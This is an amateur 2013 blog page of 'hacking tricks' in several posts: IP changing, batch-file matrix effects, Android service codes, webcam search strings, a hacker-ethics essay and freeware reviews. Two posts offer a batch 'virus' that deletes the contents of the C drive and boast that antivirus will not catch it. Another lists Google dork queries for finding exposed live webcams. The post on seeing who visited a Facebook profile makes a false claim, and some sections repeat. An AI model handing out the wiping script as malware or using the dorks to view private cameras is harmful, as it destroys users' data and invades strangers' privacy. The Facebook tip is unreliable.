Saturday 20 April 2013

Change Your Ip In Less Then 1 Minute


Change Your Ip In Less Then 1 Minute


   
                     In my previous post i had show you how to Grab someone ip address now i will show you how to change ip address in less then a minute. For now it will take 2 to 3 minutes but with some practice you can do this within a minute.


  • Click on "Start" in the bottom left corner of the screen.
  • Click on "RUN"
  • Type in "command" and click OK

      You should be now at MSDOS prompt Screen

  • Type "ipconfig /release" just like that, and press "enter"
  • Type "exit" and leave the prompt
  • Right-click on "Network Places" or "My Network Places" on your desktop.
  • Click on "properties"

     Now you should  be on a screen with something titled "Local Area Connection", or something  similar to that, and, if you have a network hooked up, all of your other networks.

  •  Right click on "Local Area Connection" and click "properties"
  • Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
  • Click on "Use the following IP address" under the "General" tab
  • Create an IP address (It doesn't matter what it is)
  • Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
  • Press the "Ok" button here
  • Hit the "Ok" button again

     Now you should be back to the "Local Area Connection" screen.

  • Right-click back on "Local Area Connection" and go to properties again.
  • Go back to the "TCP/IP" settings
  • This time, select "Obtain an IP address automatically"
  • Click on "Ok"
  • Hit "Ok" again.
  • Now you have a New IP address.

Finding Ip Address Of A Website Using Command Prompt Or CMD


Finding Ip Address Of A Website Using Command Prompt Or CMD


In this tutorial i will teach you to find Ip Address of any website using Command Prompt or in short CMD. Using IP Address you can find location of the website server and do more stuff. I will demostrate this tutorial with Google but you can use this method to find IP Address of any website like twitter, facebook etc. So lets get started.

How to find IP ?

1. Go to Start > Type CMD and press Enter.
2. Now write Ping followed by website URL whose IP you want to find.
finding ip adddress of website

3. It will take less then a second and come up with the results as shown below.
finding ip adddress of website

In  my next post i will show you another easy way to find website IP Address and teach you to use this IP to find its location.

How To Create Matrix File ?


Advance Matrix Effects
I had previously posted about Matrix effect using Notepad . But this is more advance and it looks more realistic then the previous one. So open up your notepad and get started.

How To How To Create Matrix File ?

  1. Open Notepad and copy below code.

@echo off
color 0A
:A
echo b r E w e 4 e T r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 h 2 w r e G 2
ping -w .9 >nul
echo R E 9 8 8 R a t r e g 6 n u m A b R E X e Y A T u C 7 a D R a c r u C e B E p e
ping -w .9 >nul
echo c E B E s A d R u B R 3 H e R u D 7 g u d U 7 T a b u T 5 e p E 2 a v e 6 8 a Z
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b R u d
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A Na
ping -w .9 >nul
echo v u P R a b R u c e d U s w a h a c r a t h U 7 r a h u t u h u V e 7 U k u S a
ping -w .9 >nul
echo T e D r e 8 A p r a d a b u f U c u c E h E t 7 c r 5 s P a f r e t h u t 9 u t
ping -w .9 >nul
echo b R u G e p a R e s a P H e P a 2 U d 4 P r e F A b a t h a t h U s w a d R U d
ping -w .9 >nul
echo v U Y a C R e T R 9 k u b e D r a T 6 u j e 5 2 4 e B a f 2 u b 5 w A p a y U Y
ping -w .9 >nul
echo b r E w e 4 e n r 8 M e F r a c h a S t 3 D a C r a s p e s T e 4 a 2 w r e G 2
ping -w .9 >nul
echo k u v e 4 E 6 3 e t r a d r e f e y e q e 6 U H e z U b r u R a s 2 4 3 r A Na
ping -w .9 >nul
echo v u P R a b s u c e d U s w a 3 a c r a t h U 7 r a k u t u h u V e 7 U k u S a
ping -w .9 >nul
echo n u r A X a j a s t a 9 h a 6 e h e G a s u t r a t r A y a f E q u 8 u b u u d
ping -w .9 >nul
goto A

  2. Save the file as matrix.bat  (.bat is must)
  3. Done enjoy !!

Friday 19 April 2013

Learn To Make Dangerous Virus In A Minute


In my previous post i had teach you guys to create virus that disable mouse andVirus to format Hard Disk. In this post i will teach you to make simple yet very powerfull or you can say harmfull computer virus using a batch file. No software is required to make this virus, Noteapad is enough for it. The good thing about this virus is it is not detected by any AntiVirus.


What will this virus do ?  

You will create this virus using batch file programming. This virus will delete the C Drive completely. The good thing about this virus is that it is not detected by antivirus. If you want to learn more about batch programming visit my post about Learn Batch Programming.

How to Make the virus ?

   1. Open Notepad and copy below code into it.

@Echo off
Del C:\ *.* |y

   2. Save this file as virus.bat (Name can be anything but .bat is must)
   3. Now, running this file will delete all the content of C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.

How To Disable Right Click On Your Blog ?


 Disable Right Click for blog

If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.How To Disable Right Click On Your Blog ?

 1. Got to your blogger Dashboard and then Click on Layout.
blogger widget

 2. Now Click on Add Gadget and select Html/Javascript.
blogger widget
 3. Now paste code given below in the pop up window.
<!--MBW Code-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!--Code End http://mybloggersworld.blogspot.in>
 4. Save it and done. Now users will not be able to right click on your website.  5. If you like to disable mouse on your computer then check out tutorial given below.

LOG OUT YOUR FACEBOOK ACCOUNT FROM OTHER COMPUTER

"LOG OUT YOUR FACEBOOK
ACCOUNT FROM OTHER
COMPUTER" :
Sometimes we go to cyber cafe or
any other places just to open our
facebook account but forget to
log out.. No need to worry about
it, there is a way to log it out from
any other computer..

Tutorial
* log in your account (from
anywhere)
* go to Account Settings (located
in the right side of Home)
* Choose "Security" (You will see
the below photo)
* Go to Active Sessions (All of your
Log-ins are listed their
everywhere..)
* Click End Activity and You will be
Logged Out..

Secret Hacking codes for Android Mobile Phones:

Secret Hacking codes for Android Mobile Phones:

1. Complete Information About your Phone

*#*#4636#*#*
This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:
Phone information
Battery information
Battery history
Usage statistics

2. Factory data reset

*#*#7780#*#*This code can be used for a factory data reset. It'll remove following thing

Google account settings stored in your phone
System and application data and settings
Downloaded applications

It'll NOT remove:Current system software and bundled application
SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation.

3. Format Android Phone

*2767*3855#Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage. It'll also reinstall the phone firmware.

Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

*#*#34971539#*#*
This code is used to get information about phone camera. It shows following 4 menus:
Update camera firmware in image (Don't try this option)
Update camera firmware in SD card
Get camera firmware version
Get firmware update count

WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to reinstall camera firmware.

5. End Call/Power

*#*#7594#*#*
This one is my favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, AirPlane mode and Power off.

You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option.

6. File Copy for Creating Backup

*#*#273283*255*663282*#*#*
This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

*#*#197328640#*#*
This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)

*#*#232338#*#* - Shows WiFi MAC address

*#*#1472365#*#* - GPS test

*#*#1575#*#* - Another GPS test

*#*#232331#*#* - Bluetooth test

*#*#232337#*# - Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate

*#*#1234#*#* - PDA and Phone

*#*#1111#*#* - FTA SW Version

*#*#2222#*#* - FTA HW Version

*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

10. Codes to launch various Factory Tests:

*#*#0283#*#* - Packet Loopback

*#*#0*#*#* - LCD test

*#*#0673#*#* OR *#*#0289#*#* - Melody test

*#*#0842#*#* - Device test (Vibration test and BackLight test)

*#*#2663#*#* - Touch screen version

*#*#2664#*#* - Touch screen test

*#*#0588#*#* - Proximity sensor test

*#*#3264#*#* - RAM version

Use notepad as personal diary


Use notepad as personal diary

4. Making Personal Diary Using Notepad 

notepad tricks
Here you will learn to use notepad as Digital diary or a log book to keep record of your daily work instead of using pen and paper.
    1. Open Notepad and Type .LOG (in capital Letters and press enter
    2. Save the program with any name and close it.
    3. Open the file again. Now you can see current date and time, This will happen every time you reopen notepad

Secret Hacking codes for Android Mobile Phones:

Secret Hacking codes for Android Mobile Phones:

1. Complete Information About your Phone

*#*#4636#*#*
This code can be used to get some interesting information about your phone and battery. It shows following 4 menus on screen:
Phone information
Battery information
Battery history
Usage statistics

2. Factory data reset

*#*#7780#*#*This code can be used for a factory data reset. It'll remove following thing

Google account settings stored in your phone
System and application data and settings
Downloaded applications

It'll NOT remove:Current system software and bundled application
SD card files e.g. photos, music files, etc.
Note: Once you give this code, you get a prompt screen asking you to click on "Reset phone" button. So you get a chance to cancel your operation.

3. Format Android Phone

*2767*3855#Think before you give this code. This code is used for factory format. It'll remove all files and settings including the internal memory storage. It'll also reinstall the phone firmware.

Note: Once you give this code, there is no way to cancel the operation unless you remove the battery from the phone. So think twice before giving this code.

4. Phone Camera Update

*#*#34971539#*#*
This code is used to get information about phone camera. It shows following 4 menus:
Update camera firmware in image (Don't try this option)
Update camera firmware in SD card
Get camera firmware version
Get firmware update count

WARNING: Never use the first option otherwise your phone camera will stop working and you'll need to take your phone to service center to reinstall camera firmware.

5. End Call/Power

*#*#7594#*#*
This one is my favorite one. This code can be used to change the "End Call / Power" button action in your phone. Be default, if you long press the button, it shows a screen asking you to select any option from Silent mode, AirPlane mode and Power off.

You can change this action using this code. You can enable direct power off on this button so you don't need to waste your time in selecting the option.

6. File Copy for Creating Backup

*#*#273283*255*663282*#*#*
This code opens a File copy screen where you can backup your media files e.g. Images, Sound, Video and Voice memo.

7. Service Mode

*#*#197328640#*#*
This code can be used to enter into Service mode. You can run various tests and change settings in the service mode.

8. WLAN, GPS and Bluetooth Test Codes:

*#*#232339#*#* OR *#*#526#*#* OR *#*#528#*#* - WLAN test (Use "Menu" button to start various tests)

*#*#232338#*#* - Shows WiFi MAC address

*#*#1472365#*#* - GPS test

*#*#1575#*#* - Another GPS test

*#*#232331#*#* - Bluetooth test

*#*#232337#*# - Shows Bluetooth device address

9. Codes to get Firmware version information:

*#*#4986*2650468#*#* - PDA, Phone, H/W, RFCallDate

*#*#1234#*#* - PDA and Phone

*#*#1111#*#* - FTA SW Version

*#*#2222#*#* - FTA HW Version

*#*#44336#*#* - PDA, Phone, CSC, Build Time, Changelist number

10. Codes to launch various Factory Tests:

*#*#0283#*#* - Packet Loopback

*#*#0*#*#* - LCD test

*#*#0673#*#* OR *#*#0289#*#* - Melody test

*#*#0842#*#* - Device test (Vibration test and BackLight test)

*#*#2663#*#* - Touch screen version

*#*#2664#*#* - Touch screen test

*#*#0588#*#* - Proximity sensor test

*#*#3264#*#* - RAM version

Creating dangerous virus


Creating dangerous virus

3. Creating Virus That Format C Drive

In this trick we will be creating virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. opening this file we delete or format C drive of your computer.

    1. Open Notepad and copy below code into it.
@Echo off
Del C:\ *.* |y
 
    2. Then Save this file as virus.bat
    3. Now, running this file format C Drive.

Matrix effect trick


Matrix effect trick

2. Matrix Effect Trick

matrix effect trick
In this trick i will show you to make a batch file in notepad which will act as matrix effect that you might have seen in movies.Matrix effect is basically number flashes in green color.

    1. Open Noteapad and copy below code into it.
@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

    2. Now save this file as Matrix.bat (name can be anything but .bat is must)
    3. Open your saved file and you will have matrix effect on your screen

Who visited your facebook Profile?'

Who visited your facebook Profile?'
A question for which everyone needs an answer. To Knw Follow these Simple Steps...

☑Go to Your facebook profile page.

☑Right click on your mouse and select 'View Page Source' or just hit Ctrl+U.

☑Now hit Ctrl+F and search for "ordered_list.top_friends" (without quotes).

☑You will see a series of profile IDs within quotes. These are the profile IDs of your friends who visit your profile more often.

☑The first one visits the most number of time while the last one visits hardly takes a visit.

☑Copy any one profile ID & paste it in the browser's address bar as 'www.facebook.com/PROFILE-ID' and hit Enter to know who is it.

☑Likewise, you can check the who visited your profile.

How to make nameless folder in XP


How to make nameless folder in XP

How To Make Nameless Folder

Before attempting this trick, try to make a folder with no name and you will fail to do so. This is what this trick will let you do. Below is screenshot of folder before and after doing this interesting trick.
creating nameless folder
  1. Make a Newfolder on desktop or where ever you want.
  2. Right click on this newly created folder and select Rename.
  3. Erase the text showing "New Folder".
  4. Now keep Pressing Alt (i.e alter key) and type 255. If you are on laptop then you need to enable your Num Lock and type from the highlighted number keys not from those below function keys.
  5. After that leave alt key and Press enter.
  6. Done you just created nameless folder.

How to become a serious hacker


kick out of breaking into computers and phreaking the phone system. (Like those of you who keep asking about how to hack facebook :( )Real hackers call these people ‘CRACKERS’ and want nothing to do with them. Real hackers object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer.

There are people who apply the true hacker attitude to other things, like electronics or music — but in the rest of this article we will focus the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker.'

Steps:
1.Adopt the mindset of a hacker.
Hackers solve problems and build things, and they believe in freedom and voluntary mutual HELP. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

2.Earn respect as a hacker.
By helping other hackers solve problems (mostly for free). In the hacking world, no problem should ever have to be solved twice. The thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

3.Learn how to program.
The best way to learn is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more, and repeat until your writing begins to develop the kind of strength and economy you see in your models. To be a real hacker, however, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages. Besides being the most important hacking languages, the following represent very different approaches to programming, and each will educate you in valuable ways:
Learn Python, C, C++, Java and also HTML ( we provide a massive tutorials on very many lanuages)

4.Familiarizing Yourself With Unix.
Get one of the open-source Unixes and learn to use and run it. Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. So, bring up a Unix (like Linux but there are other ways and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code.

5. Be a Logical Thinker.
In your free time when you do not have a computer, develop a habit of doing things that improve your logical thinking.
eg you can try and solve problems you see along your way with your mind (but if possible you can fix them physically), you can try writing your own code, you can play mind games eg chess, you can watch science fiction films, develop an analytical ear for music. etc all this to help your thinking grow.

Okay guys there you go on the very basic steps. But thats not all though, there's a many tutorials all over the internet that can help build your skills and you can make money through those skills too.

REMEMBER THERE IS A DIFFERENCE BETWEEN A HACKER AND A CRACKER. CRACKING IS ILLEGAL AND CHEAP; HACKING MAKES THE WORLD AN EASIER PLACE TO LIVE IN.
and on this page we assist hackers, new hackers and all guys about computer stuff, so even if you do not want to become a hacker, you just want some problem fixed, we are here for you. :)
Photo: HOW TO BECOME A SERIOUS HACKER?
------------------------------------------------------------------------
There is a community, a shared culture, of expert programmers and networking wizards that traces its history back through decades to the first time-sharing minicomputers and the earliest ARPAnet experiments. The members of this culture originated the term ‘hacker.’

There is another group of people who loudly call themselves hackers, but aren't. These are people who get a kick out of breaking into computers and phreaking the phone system. (Like those of you who keep asking about how to hack facebook :( )Real hackers call these people ‘CRACKERS’ and want nothing to do with them. Real hackers object that being able to break security doesn't make you a hacker any more than being able to hotwire cars makes you an automotive engineer.

There are people who apply the true hacker attitude to other things, like electronics or music — but in the rest of this article we will focus the skills and attitudes of software hackers, and the traditions of the shared culture that originated the term ‘hacker.'

Steps:
1.Adopt the mindset of a hacker.
Hackers solve problems and build things, and they believe in freedom and voluntary mutual HELP. To be accepted as a hacker, you have to behave as though you have this kind of attitude yourself. And to behave as though you have the attitude, you have to really believe the attitude.

2.Earn respect as a hacker.
By helping other hackers solve problems (mostly for free). In the hacking world, no problem should ever have to be solved twice. The thinking time of other hackers is precious — so much so that it's almost a moral duty for you to share information, solve problems and then give the solutions away just so other hackers can solve new problems instead of having to perpetually re-address old ones.

3.Learn how to program.
The best way to learn is to read some stuff written by masters of the form, write some things yourself, read a lot more, write a little more, read a lot more, write some more, and repeat until your writing begins to develop the kind of strength and economy you see in your models. To be a real hacker, however, you need to get to the point where you can learn a new language in days by relating what's in the manual to what you already know. This means you should learn several very different languages. Besides being the most important hacking languages, the following represent very different approaches to programming, and each will educate you in valuable ways:
Learn Python, C, C++, Java and also HTML ( we provide a massive tutorials on very many lanuages)

4.Familiarizing Yourself With Unix.
Get one of the open-source Unixes and learn to use and run it. Unix is the operating system of the Internet. While you can learn to use the Internet without knowing Unix, you can't be an Internet hacker without understanding Unix. For this reason, the hacker culture today is pretty strongly Unix-centered. So, bring up a Unix (like Linux but there are other ways and yes, you can run both Linux and Microsoft Windows on the same machine). Learn it. Run it. Tinker with it. Talk to the Internet with it. Read the code. Modify the code.

5. Be a Logical Thinker.
In your free time when you do not have a computer, develop a habit of doing things that improve your logical thinking.
eg you can try and solve problems you see along your way with your mind (but if possible you can fix them physically), you can try writing your own code, you can play mind games eg chess, you can watch science fiction films, develop an analytical ear for music. etc all this to help your thinking grow.

Okay guys there you go on the very basic steps. But thats not all though, there's a many tutorials all over the internet that can help build your skills and you can make money through those skills too.

REMEMBER THERE IS A DIFFERENCE BETWEEN A HACKER AND A CRACKER. CRACKING IS ILLEGAL AND CHEAP; HACKING MAKES THE WORLD AN EASIER PLACE TO LIVE IN.
and on this page we assist hackers, new hackers and all guys about computer stuff, so even if you do not want to become a hacker, you just want some problem fixed, we are here for you. :)

Thursday 18 April 2013

Live webcams hacked through Google


Live webcams hacked through Google

Google webcams hack Pick up any string and search it on google, now click on any link and see the live webcam.

inurl:?CgiStart?page=?
inurl:/view.shtml
intitle:?Live View / ? AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:?live view? intitle:axis
intitle:liveapplet
allintitle:?Network Camera NetworkCamera? (disconnected)
intitle:axis intitle:?video server?
intitle:liveapplet inurl:LvAppl
intitle:?EvoCam? inurl:?webcam?
intitle:?Live NetSnap Cam-Server feed?
intitle:?Live View / ? AXIS?
intitle:?Live View / ? AXIS 206M?
intitle:?Live View / ? AXIS 206W?
intitle:?Live View / ? AXIS 210?
inurl:indexFrame.shtml Axis
inurl:?MultiCameraFrame?Mode=Motion? (disconnected)
intitle:start inurl:cgistart
intitle:?WJ-NT104 Main Page?
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:?sony network camera snc-p1?
intitle:?sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:?Toshiba Network Camera? user login
intitle:?netcam live image? (disconnected)
intitle:?i-Catcher Console ? Web Monitor?

It will show any webcam active in the world which is available for public. Hacking a specific webcam is not supported by us. Its highly illegal and violate the victim's personal life. Please dont ask it to us.

Saturday 13 April 2013

Secure and hide your desktop

Lock and hide your desktop



ScreenBlur will offer you the possibility to safely secure your desktop with a selected password.

ScreenBlur will ask you to set a password. Right click the program's icon in system tray to change the password, lock your screen, and options :
· Auto Lock : Locks the screen when user does not use the mouse and keyboard for a while.
· Auto Start : The program starts with windows, and is ready to lock the screen.

You can also lock the screen with a left click on its tray icon, or after you set or change
the password.

Lock from keyboard: Press and release the left Ctrl key twice.

If you forgot your password, restart the system and remove the Data folder from the applications directory. The program will then ask for a new password.

To normally shut down the system when screen is locked, use ScreenBlur's shut down button.

When the screen is locked, type your password directly, to unlock it.

Here are some key features of "ScreenBlur":

· Lock screen with a password.
· Hide visible windows, icons, gadgets and taskbar.
· Auto Lock, mute sound, customizable lock screen.
· Desktop Blackout (hide desktop icons under a black screen).
· Hot keys support.
· Preview mode.
· Notice when password is changed.

Requirements:

· .NET Framework 2.0 or higher


Screenshots:Posted Image
Posted Image
Posted Image
Posted Image
Posted Image
Download:

http://www.softpedia.com/progDownload/ScreenBlur-Download-204280.html


Direct download:
Download Now! 

Anti Tracks Free: Protect sensitive data, privacy, online identity and computer usage pattern

Anti Tracks Free: Protect sensitive data, privacy, online identity and computer usage pattern

Every time you work on your Windows computer or browse the Internet, you leave tracks behind on your computer. Every time you search on your PC or open or create files, you leave traces behind. Every time you visit a website or view a video, you leave tracks behind. These traces can serve as an open book to anyone has access to your computer and knows where to look for. Using the in-built Disk Clean utility may help you clear your cache, history and delete other unwanted files, but it still leaves a lot behind.

Posted Image

Anti Tracks Free for Windows, will allow you to permanently erase ALL browser cache and history, Windows usage traces, Microsoft Office traces, third-party application usage history, tracks of hidden data, and more – without any chance of recovery even with the help of the most sophisticated computer data recovery tools.
The first time you run Anti Tracks, you will be greeted with a wizard, that will present you with a variety of options. You can select and choose all that you wish to delete and then save your settings. having saved your settings once, the next time onwards, it becomes a one-click cleaning operation. You can of course, always change these settings in future, through the programs UI.
Anti Tracks Free allows you to conceal or hide files or even securely delete data. It also includes a set of advanced security tools that allow you to securely hide sensitive files and folders, permanently delete files, an uninstaller, a startup manager, and more.
The UI is very pleasing to look at and quite easy to use.
Anti Tracks Free download

If you are security conscious and want to protects your sensitive data, privacy, online identity and computer usage pattern, you want to check out Anti Tracks Free. Using it, will eliminate any risk of having sensitive information recovered by permanently removing all traces on your Windows computer.

Home page: http://www.giantmatr...s-free-edition/
Download Link: http://www.giantmatr...-free-setup.exe 

Encoding Decoding 3.1.1

Encoding Decoding 3.1.1

Posted Image

Encoding Decoding 3


Screen Shots:

Posted Image


Encoding Decoding 3 is a free program used to encrypt and password protect files.
There are no restrictions as to what kind of files you encrypt nor are there any as to how long you make your passwords.

It's very easy to use and could be very effective depending on how it is used.

Encoding Decoding also comes in a portable version. (I have not used this one before)



Homepage:
http://elefantsoftware-en.weebly.com/encoding-decoding.html

Downloads:
http://elefantsoftware.weebly.com/encoding-decoding-languages.html